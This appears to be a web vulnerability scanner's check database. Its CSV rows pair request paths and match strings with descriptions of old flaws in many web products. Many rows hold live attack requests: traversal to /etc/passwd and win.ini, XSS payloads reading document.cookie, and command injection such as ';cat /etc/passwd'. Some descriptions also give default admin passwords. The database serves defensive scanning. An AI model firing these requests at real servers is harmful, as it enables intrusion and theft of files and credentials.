"generic","/add.php3?url=ja&adurl=javascript:","","GET","AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," " "generic","/addressbook.php?\">" "generic","/bottom.html","Topaz Prism","GET","Topaz Prism appears to be running, try login with admin/admin." "generic","/buddies.blt","200","GET","Buddy List?" "generic","/buddy.blt","200","GET","Buddy List?" "generic","/buddylist.blt","200","GET","Buddy List?" "generic","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","passwd","GET","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher." "generic","/c32web.exe/ChangeAdminPassword","200","GET","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password." "generic","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","[fonts]","GET","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" "generic","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","root:","GET","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" "generic","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","[windows]","GET","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" "generic","/ca000001.pl?ACTION=SHOWCART&hop=\">&PATH=acatalog%2f","","GET","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/ca000007.pl?ACTION=SHOWCART&REFPAGE=\">","","GET","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/calendar.php?year=&month=03&day=05","","GET","DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/cartcart.cgi","200","GET","If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands." "generic","/catalog/includes/include_once.php","200","GET","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/" "generic","/categorie.php3?cid=june","Unable to jump to row","GET","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent." "generic","/catinfo","200","GET","May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test." "generic","/catinfo?TESTING","TESTING","GET","The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/cbms/cbmsfoot.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/" "generic","/cbms/changepass.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/" "generic","/cbms/editclient.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/" "generic","/cbms/passgen.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/" "generic","/cbms/realinv.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/" "generic","/cbms/usersetup.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/" "generic","/cd-cgi/sscd_suncourier.pl","200","GET","Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done." "generic","/cfappman/index.cfm","200!not found","GET","susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" "generic","/cfcache.map","Mapping","GET","May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html" "generic","/cfdocs/cfcache.map","Mapping","GET","May leak directory listing, may also leave server open to a DOS" "generic","/cfdocs/cfmlsyntaxcheck.cfm","200!not found","GET","can be used for a DoS on the server by requesting it check all .exe's" "generic","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","boot loader","GET","Allows attacker to view arbitrary files" "generic","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","boot loader","GET","Allows attacker to view arbitrary files" "generic","/cfdocs/examples/cvbeans/beaninfo.cfm","200!not found","GET","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" "generic","/cfdocs/examples/parks/detail.cfm","200!not found","GET","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" "generic","/cfdocs/expeval/displayopenedfile.cfm","200!not found","GET","Unknown vul" "generic","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","boot loader","GET","Allows attacker to view arbitrary files." "generic","/cfdocs/expeval/openfile.cfm","200","GET!not found","Can use to expose the system/server path." "generic","/cfdocs/expeval/openfile.cfm","200","GET","Sample code shipped with ColdFusion may allow an attacker to verify the existance of files or directories outside the web server path, launch Denial of Service attacks, and more. CVE-1999-0924. Allaire ASB99-02 (http://www.macromedia.com/v1/handlers/index.cfm?ID=8739&Method=Full)." "generic","/cfdocs/expeval/sendmail.cfm","200","GET!not found","can be used to send email; go to the page and fill in the form" "generic","/cfdocs/snippets/evaluate.cfm","200","GET!not found","can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info" "generic","/cfdocs/snippets/fileexists.cfm","200","GET!not found","can be used to verify the existance of files (on the same drive info as the web tree/file)" "generic","/cfdocs/snippets/gettempdirectory.cfm","200!not found","GET","depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory" "generic","/cfdocs/snippets/viewexample.cfm","200!not found","GET","this can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file (.cfm is assumed)" "generic","/cfide/administrator/index.cfm","PasswordProvided","GET","Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314." "generic","/CFIDE/administrator/index.cfm","PasswordProvided","GET","ColdFusion Administrator for Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538. ALLAIRE:ASB00-14. BID-1314." "generic","/cfide/Administrator/startstop.html","200","GET","can start/stop the server" "generic","/CFIDE/probe.cfm","Error occured in:","GET","Cold Fusion MX Server reveals the file system path to the web root in error messages. Set 'Enable Robust Exception Information' on the 'Debugging Settings' page." "generic","/cgi-bin-sdb/printenv","/usr/bin/perl","GET","SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431." "generic","/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E","alert(\"alert\")","GET","Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi","200","GET","Older versions of this CGI allow any user to change the administrator password." "generic","/cgi-bin/admin/admin.cgi","200","GET","May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio." "generic","/cgi-bin/admin/setup.cgi","200","GET","May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio." "generic","/cgi-bin/bigconf.cgi","200","GET","BigIP Configuration CGI" "generic","/cgi-bin/common/listrec.pl","200","GET","This CGI allows attackers to execute commands on the host." "generic","/cgi-bin/handler","200","GET","comes with IRIX 5.3 - 6.4; allows to run arbitrary commands" "generic","/cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download","root:","GET","comes with IRIX 5.3 - 6.4; allows to run arbitrary commands" "generic","/cgi-bin/MachineInfo","200","GET","gives out information on the machine (IRIX), including hostname" "generic","/cgi-bin/pfdisplay.cgi","200","GET","comes with IRIX 6.2-6.4; allows to run arbitrary commands" "generic","/cgi-bin/test2.pl?<script>alert('Vulnerable');</script>","","GET","Default Monkey server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/cgi-bin/webdist.cgi","200","GET","comes with IRIX 5.0 - 6.3; allows to run arbitrary commands" "generic","/cgi-bin/wrap","200","GET","comes with IRIX 6.2; allows to view directories" "generic","/cgi-local/cgiemail-1.4/cgicso?query=","","GET","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/cgi-local/cgiemail-1.4/cgicso?query=AAA","400 Required field missing: fingerhost","GET","This CGI allows attackers to execute remote commands." "generic","/cgi-local/cgiemail-1.6/cgicso?query=","","GET","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/cgi-local/cgiemail-1.6/cgicso?query=AAA","400 Required field missing: fingerhost","GET","This CGI allows attackers to execute remote commands." "generic","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","root:","GET","This CGI allows reading of remote files. CAN-2001-1019." "generic","/cgi-sys/addalink.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/cgiecho","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/cgiemail","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/countedit","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/domainredirect.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/entropybanner.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/entropysearch.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/FormMail-clone.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/helpdesk.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/mchat.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/randhtml.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/realhelpdesk.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/realsignup.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/scgiwrap","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi-sys/signup.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" "generic","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","[fonts]","GET","The ColdFusion install allows attackers to read arbitrary files remotely" "generic","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","[fonts]","GET","The ColdFusion install allows attackers to read arbitrary files remotely" "generic","/cgi/cgiproc?","200","GET","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later." "generic","/cgis/wwwboard/wwwboard.cgi","200","GET","Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'." "generic","/cgis/wwwboard/wwwboard.pl","200","GET","Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'." "generic","/chassis/config/GeneralChassisConfig.html","Chassis Configuration","GET","The Cabletron switch may allow remote configuration, or data retrieval, through the web interface." "generic","/chat/!nicks.txt","200","GET","WF-Chat 1.0 Beta allows retrieval of user information." "generic","/chat/!pwds.txt","200","GET","WF-Chat 1.0 Beta allows retrieval of user information." "generic","/chat/data/usr","200","GET","SimpleChat! 1.3 allows retrieval of user information." "generic","/chat/register.php?register=yes&username=OverG&email=&email1=","alert(\"Vulnerable\")","GET","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/class/mysql.class","This program is free software","GET","Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials." "generic","/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"","","GET","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02." "generic","/cleartrust/ct_logon.asp?CTLoginErrorMsg=","","GET","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02." "generic","/clusterframe.jsp","200","GET","Macromedia Jrun 4 build 61650 remote administration interface is vulnerable to several CSS attacks." "generic","/clusterframe.jsp?cluster=","","GET","Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a CSS attack." "generic","/com","index of","GET","Java class files may be browsable." "generic","/COM","index of","GET","Java class files may be browsable." "generic","/comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview","","GET","This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." "generic","/comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>","","GET","php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/config.inc","200","GET","DotBr 0.1 configuration file includes usernames and passwords." "generic","/config.php","200","GET","PHP Config file may contain database IDs and passwords." "generic","/config/","200","GET","Configuration information may be available remotely." "generic","/Config1.htm","200","GET","This may be a D-Link, some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info." "generic","/contents.php?new_language=elvish&mode=select","200","GET","Requesting a file with an invalid language selection from DC Portal may reveal the system path." "generic","/counter/1/n/n/0/3/5/0/a/123.gif","200","GET","The Roxen Counter may eat up excessive CPU time with image requests." "generic","/cpanel/","200","GET","Web-based control panel" "generic","/cplogfile.log","200","GET","XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version." "generic","/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00","root:","GET","w-agora 4.1.5 allows any file to be retrieved from the remote host." "generic","/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1","root:","GET","w-agora 4.1.5 allows any file to be retrieved from the remote host." "generic","/custdata/","200","GET","This may be COWS (CGI Online Worldweb Shopping), and may be interesting..." "generic","/cutenews/index.php?debug","PHP Version","GET","Cutenews 1.3 contains an information disclosure bug that reveals standard 'phpinfo' page output." "generic","/CVS/Entries","200","GET","CVS Entries file may contain directory listing information." "generic","/data.sql","200","GET","Database SQL?" "generic","/data/member_log.txt","200","GET","Teekai's forum full 1.2 member's log can be retrieved remotely." "generic","/data/userlog/log.txt","200","GET","Teekai's Tracking Online 1.0 log can be retrieved remotely." "generic","/database/","200","GET","Databases? Really??" "generic","/database/metacart.mdb","200","GET","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," " "generic","/databases/","200","GET","Databases? Really??" "generic","/databse.sql","200","GET","Database SQL?" "generic","/db.sql","200","GET","Database SQL?" "generic","/db/users.dat","200","GET","upb PB allows the user database to be retrieved remotely." "generic","/DB4Web/10.10.10.10:100","connect()","GET","The remote DB4Web server may allow you to connect to arbitrary machines and ports." "generic","/dc/auth_data/auth_user_file.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." "generic","/dc/orders/orders.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." "generic","/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00","root:","GET","This install of DCForum allows attackers to read arbitrary files on the host." "generic","/dcshop/auth_data/auth_user_file.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." "generic","/dcshop/orders/orders.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." "generic","/debug/dbg?host==","","GET","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02." "generic","/debug/echo?name=","","GET","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02." "generic","/debug/errorInfo?title===","","GET","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02." "generic","/debug/showproc?proc===","","GET","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02." "generic","/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","","GET","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","","GET","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/demo/ojspext/events/globals.jsa","event:application_OnStart","GET","Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information." "generic","/demo/sql/index.jsp","JSP SQL Samples","GET","This default may allow connectivity to the Oracle databases." "generic","/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00","root:","GET","Typo3 allows any file to be retrieved remotely. Upgrade to the latest version." "generic","/directory.php?dir=%3Bcat%20/etc/passwd","root:","GET","Marcus S. Xenakis directory.php script allows for command execution. CAN-2002-0434." "generic","/dms0","DMSDUMP version","GET","Default Oracle 9iAS allows access to Dynamic Monitoring Services" "generic","/doc/","200","GET","The /doc directory is browsable. This may be /usr/doc." "generic","/doc/packages/","index of /doc","GET","This directory may show attackers all the packages installed on the system." "generic","/docs/","","GET","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CAN-2003-0801." "generic","/docs/NED?action=retrieve&location=.","docs\ned","GET","Nokia Electronic Documentation allows directory listings and reveals its installation path. CAN-2003-0802." "generic","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","boot loader","GET","Gafware's CFXImage allows remote users to view any file on the system." "generic","/DomainFiles/*//../../../../../../../../../../etc/passwd","root:","GET","Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system." "generic","/dostuff.php?action=modify_user","200","GET","Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/" "generic","/download.php?op=viewdownload","Failed opening","GET","PHPNuke allows file system paths to be revealed." "generic","/download.php?op=viewdownload","Fatal error","GET","PHPNuke allows file system paths to be revealed." "generic","/download.php?sortby=&dcategory=","","GET","This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." "generic","/downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\"","","GET","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\"","","GET","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\"","","GET","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd","root:","GET","EditTag allows arbitrary file retrieval." "generic","/emailfriend/emailarticle.php?id=\"","","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/emailfriend/emailfaq.php?id=\"","","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/emailfriend/emailnews.php?id=\"","","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/error/500error.jsp?et=1;","","GET","Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02." "generic","/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/","http://xxxxxxxx/errors/configure_instructions","GET","Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version." "generic","/esp?PAGE=<script>alert(document.cookie)</script>","","GET","Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/etc/passwd","root:","GET","An '/etc/passwd' file is available through the web site. This may not be good at all." "generic","/ews/ews/architext_query.pl","200","GET","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665." "generic","/exair/howitworks/Code.asp","200","GET","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193." "generic","/examples/basic/servlet/HelloServlet","The source of this servlet is in","GET","Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet." "generic","/examples/jsp/snp/anything.snp","200","GET","Tomcat servlet gives lots of host information."," " "generic","/exec/show/config/cr","ip address","GET","The Cisco router's web install allows arbitrary commands to be executed remotely." "generic","/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C","200","GET","This check (A) sets up the next bad blue test (B) for possible exploit. see http://www.badblue.com/down.htm" "generic","/ext.ini.%00.txt","200","GET","BadBlue allows access restrictions to be bypassed by using a null byte." "generic","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","root:","GET","eZ httpbench version 1.1 allows any file on the remote server to be retrieved." "generic","/fcgi-bin/echo.exe?foo=","","GET","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/fcgi-bin/echo2.exe?foo=","","GET","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/file-that-is-not-real-2002.php3","Unable to open","GET","PHP is configured to show the web root when sending error messages. Set display_errors to 'off'." "generic","/filemanager/filemanager_forms.php","200","GET","Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info" "generic","/finance.xls","200","GET","Finance spreadsheet?" "generic","/finances.xls","200","GET","Finance spreadsheet?" "generic","/firewall/policy/dlg?q=-1&fzone=t>&tzone=dmz","","GET","Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages." "generic","/firewall/policy/policy?fzone=internal&tzone=dmz1","","GET","Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages." "generic","/foo.php3","200","GET","DotBr 0.1 has a phpinfo() script called foo.php3." "generic","/forum/admin/database/wwForum.mdb","200","GET","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein" "generic","/forum/admin/wwforum.mdb","200","GET","Web Wiz Forums passwords found." "generic","/forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","root:","GET","The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" "generic","/forum/index.php?method=<script>alert('Vulnerable')</script>","","GET","Zorum v3.4 and below are vulnerable to XSS attacks." "generic","/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"","GET","alert(document.cookie)","Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/forums/@ADMINconfig.php","200","GET","PHP Config file may contain database IDs and passwords." "generic","/forums/browse.php?fid=3&tid=46&go=","","GET","php(Reactor) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/forums/config.php","200","GET","PHP Config file may contain database IDs and passwords." "generic","/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD","","GET","YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02." "generic","/forums/index.php?top_message=<script>alert(document.cookie)</script> ","200","GET","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","uid","GET","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html" "generic","/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","uid","GET","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html" "generic","/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22","alert('Vulnerable')","GET","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/fpdb/shop.mdb","200","GET","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," " "generic","/friend.php?op=SiteSent&fname=","","GET","This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." "generic","/gallery/search.php?searchstring=","","GET","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288." "generic","/ganglia/","Cluster","GET","Ganglia Cluster reports reveal detailed information." "generic","/gb/index.php?login=true","200","GET","gBook may allow admin login by setting the value 'login' equal to 'true'." "generic","/geeklog/users.php","200","GET","Geeklog prior to 1.3.8-1sr2 contain a SQL injection vulnerability that lets a remote attacker reset admin password." "generic","/getaccess","200","GET","This may be an indication that the server is running getAccess for SSO" "generic","/global.inc","200","GET","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php" "generic","/globals.jsa","200","GET","Oracle globals.jsa file" "generic","/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E","200","GET","MPM Guesbook 1.2 and previous are vulnreable to CSS/XSS attacks." "generic","/guestbook/admin.php","200","GET","Guestbook admin page available without authentication." "generic","/guestbook/admin/o12guest.mdb","200","GET","Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password." "generic","/guestbook/guestbook.html","Jason Maloney","GET","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01" "generic","/guestbook/guestbookdat","200","GET","PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration." "generic","/guestbook/pwd","200","GET","PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password." "generic","/GW5/GWWEB.EXE?HELP=bad-request","Could not find file SYS","GET","Groupwise allows system information and file retrieval by modifying arguments to the help system." "generic","/GWWEB.EXE?HELP=bad-request","Could not find file SYS","GET","Groupwise allows system information and file retrieval by modifying arguments to the help system. CAN-2002-0341." "generic","/help.html","nice little interface into SPIKE","GET","SPIKE Proxy may be running. Try using this port as a proxy, and see http://www.immunitysec.com/". "generic","/help.php?chapter=","","GET","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/help/","200","GET","Help directory should not be accessible" "generic","/hola/admin/cms/htmltags.php?datei=./sec/data.php","200","GET","hola-cms-1.2.9-10 may reveal the administrator ID and password." "generic","/home.php?arsc_language=elvish","Failed opening '","GET","ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified." "generic","/horde/imp/test.php","Horde Versions","GET","Horde script reveals detailed system/Horde information." "generic","/horde/test.php","IMP: 3.(0|1|2|2\.1)","GET","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2." "generic","/horde/test.php?mode=phpinfo","PHP Version","GET","Horde allows phpinfo() to be run, which gives detailed system information." "generic","/hostadmin/?page='","C:\","GET","Host Admin reveals install location and other sensitive information." "generic","/hostadmin/?page='","D:\","GET","Host Admin reveals install location and other sensitive information." "generic","/hostingcontroller/","200","GET","This might be interesting...probably HostingController, www.hostingcontroller.com" "generic","/hp/device/this.LCDispatcher","200","GET","The Hewlett Packard Color LaserJet 4550 may allow unauthenticated users to permanently include links (and other data) in the web interface." "generic","/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","uid","GET","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html" "generic","/html/cgi-bin/cgicso?query=","","GET","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/html/cgi-bin/cgicso?query=AAA","400 Required field missing: fingerhost","GET","This CGI allows attackers to execute remote commands." "generic","/html/chatheader.php?mainfile=anything&Default_Theme='","","GET","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/html/partner.php?mainfile=anything&Default_Theme='","","GET","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/htpasswd","200","GET","Passwords?" "generic","/https-admserv/bin/index?/","","GET","Sun ONE Web Server 6.1 administration control is vulnerable to CSS attacks." "generic","/IlohaMail/blank.html","200","GET","IlohaMail 0.8.10 contains a CSS vulnerability. Previous versions contain other non-descript vulnerabilities." "generic","/image/","Index of ","GET","index of image directory available" "generic","/images/","Index of ","GET","index of image directory available" "generic","/images/?pattern=/etc/*&sort=name","passwd","GET","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl." "generic","/img-sys/","200","GET","Default image directory should not allow directory listing." "generic","/imp/horde/test.php","Horde Versions","GET","Horde script reveals detailed system/Horde 